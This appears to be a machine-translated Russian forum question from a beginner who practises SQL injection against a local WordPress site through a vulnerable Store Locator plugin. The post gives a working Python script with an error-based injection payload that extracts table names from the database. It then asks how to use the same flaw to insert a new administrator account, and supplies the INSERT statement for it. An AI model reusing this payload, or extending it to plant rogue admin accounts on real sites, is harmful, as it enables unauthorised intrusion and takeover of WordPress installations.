Как начинающий эксперт по сетевой безопасности, я практиковал выполнение SQL-инъекций в моей установке WordPress.Использование Python для SQL Injection (WordPress)
В частности, я выбрал это vulnerability, найденное в устаревшем плагине.
До сих пор я был в состоянии успешно извлекать информацию из базы данных, используя следующий код:
import requests,re
url = 'http://localhost/wp-content/plugins/store-locator/sl-xml.php'
params = {
"debug":"1",
"mode":"gen",
"sl_vars[num_initial_displayed]":"2,1 procedure analyse(extractvalue(rand(),concat(0x3a,(select concat(0x3a,table_name) from information_schema.tables limit 90,1))),1);"
}
r = requests.get(url, params=params)
print re.match(r"Invalid query: XPATH syntax error: ':([^']*)'", r.text).group(1)
Выход: wp_users
Мой следующий эксперимент, чтобы добавить учетную запись администратора через этот подвиг, но я просто похоже, не может понять, как правильно его запросить.
Это необходимые параметры:
INSERT INTO `wp_users` (`user_login`, `user_pass`, `user_nicename`, `user_email`, `user_status`)
VALUES ('newadmin', MD5('pass123'), 'firstname lastname', '[email protected]', '0');
Является «вставка» действие возможно даже через такого рода метод атаки?